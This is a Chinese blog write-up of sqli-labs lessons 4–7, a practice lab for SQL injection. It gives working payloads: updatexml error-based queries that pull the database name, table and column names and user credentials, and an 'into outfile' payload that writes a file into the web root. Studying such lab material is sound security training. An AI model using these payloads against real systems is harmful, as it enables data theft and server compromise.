LESS--4

先试一下单引号,发现没有效果,不报错,然后根据题目用双引号,报错。

根据报错的内容可以发现,参数ID是包括在一对双引号和括号之中的。和上一题类似,构造注入查询语句。

") and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

接下来的步骤和之前一样。

LESS--5

知道数据库名是security之后,开始爆库。

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),1)--+

找到其中有一个users的表,一般就是我们需要找的表。然后查看表的字段名。

' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1)--+

发现字段分别是id username password.。好了,有username和password我们就开始爆数据。

' and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),1)--+

第一个用户,用户名和密码都是Dumb。然后把limit后面的参数修改一下,就能查看其他用户的信息了,limit 0,1是第一个数据,limit 1,1是第二个数据,注意limit和substr不一样,limit是从0开始的,而substr是从1开始的。

LESS--6

和上一题不同的是这题是加双引号进行注入。其他都一样。

LESS--7

添加单引号,发现报错,猜测可能是字符型的注入。

首先添加单引号报错,再添加and 1=1 --+ 发现报错 认为不是单纯的单引号的类型,应该是还有其他的字符, 比如两个单引号,或者单引号括号, 或者单引号双引号, 单引号单引号括号之类的。

payload:?id=1')) union select 1,2,3 into outfile "C:\\wamp\\www\\sql\\Less-7\\test.txt"--+

测试是否写入:

发现确实存在,已经成功写入。

随机推荐

  1. Solon Java Framework v1.12.2 发布

    一个更现代感的 Java 应用开发框架:更快.更小.更自由.没有 Spring,没有 Servlet,没有 JavaEE:独立的轻量生态.主框架仅 0.1 MB. @Controller public ...

  2. Caddy-用Go写的新一代可扩展WebServer

    前几天用 Netmaker 的时候发现它用 Caddy 替换掉了 Nginx,用了后发现确实简单好用,就安利一下. Caddy 是一个强大的.可扩展的平台,用 Go 编写,可以为你的站点.服务和应用程 ...

  3. 分布式协议与算法-Quorum NWR

    1.强一致性与最终一致性 1.1强一致性 强一致性能保证写操作完成后,任何后续访问都能读到更新后的值:强一致性可以保证从库有与主库一致的数据.如果主库突然宕机,我们仍可以保证数据完整.但如果从库宕机或 ...

  4. 【随笔记】T507 Android10 EC200U-CN 4G Cat1 移植

    基本信息 硬件信息 硬件平台:T507 (Android 10 Linux 4.9) 模组型号:EC200U-CN(Cat1)(展讯芯片) 相关文件 代理提供 longan/kernel/linux- ...

  5. 视觉十四讲:第九讲_BA优化_g2o

    1.投影模型和BA代价函数 这个流程就是观测方程 之前抽象的记为: \(z = h(x, y)\) 现在给出具体的参数话过程,x指此时相机的位姿R,t,它对应的李代数为\(\xi\).路标y即为这里的 ...

  6. JZOJ 4296. 有趣的有趣的家庭菜园

    [NOIP2015模拟11.2]有趣的有趣的家庭菜园 题面 思路一 暴力 \(30\) 分! 很容易打,但是要注意: 开 \(\texttt{long long}\) 是非严格高于(等于是被允许的) ...

  7. zerologon复现

    zerologon漏洞复现 目录 zerologon漏洞复现 漏洞介绍 实验环境 实验开始 一.在github上下载脚本 二.检测是否可以利用 三.利用漏洞 1.清空域控账号密码 2.导出admin凭 ...

  8. 代码随想录算法训练营day21 | leetcode ● 530.二叉搜索树的最小绝对差 ● 501.二叉搜索树中的众数 ● ***236. 二叉树的最近公共祖先

    LeetCode 530.二叉搜索树的最小绝对差 分析1.0 二叉搜索树,中序遍历形成一个升序数组,节点差最小值一定在中序遍历两个相邻节点产生 ✡✡✡ 即 双指针思想在树遍历中的应用 class So ...

  9. openwrt 网络检测脚本

    背景 openwrt 有些固件不太稳定,会时不时的断网,导致家里无法上网,遇到这种情况只能手动重启openwrt设备,该操作不方便,作为一个极客爱好者,那肯定是要实现自动化处理的了,写一个简单的脚本加 ...

  10. nginx编译安装以及常用参数详解

    1 基于ansible role实现编译安装nginx 利用ansible控制端10.0.0.8机器,在被控制端10.0.0.18上部署nginx 首先打通ansible控制端与被控制端的基于key验 ...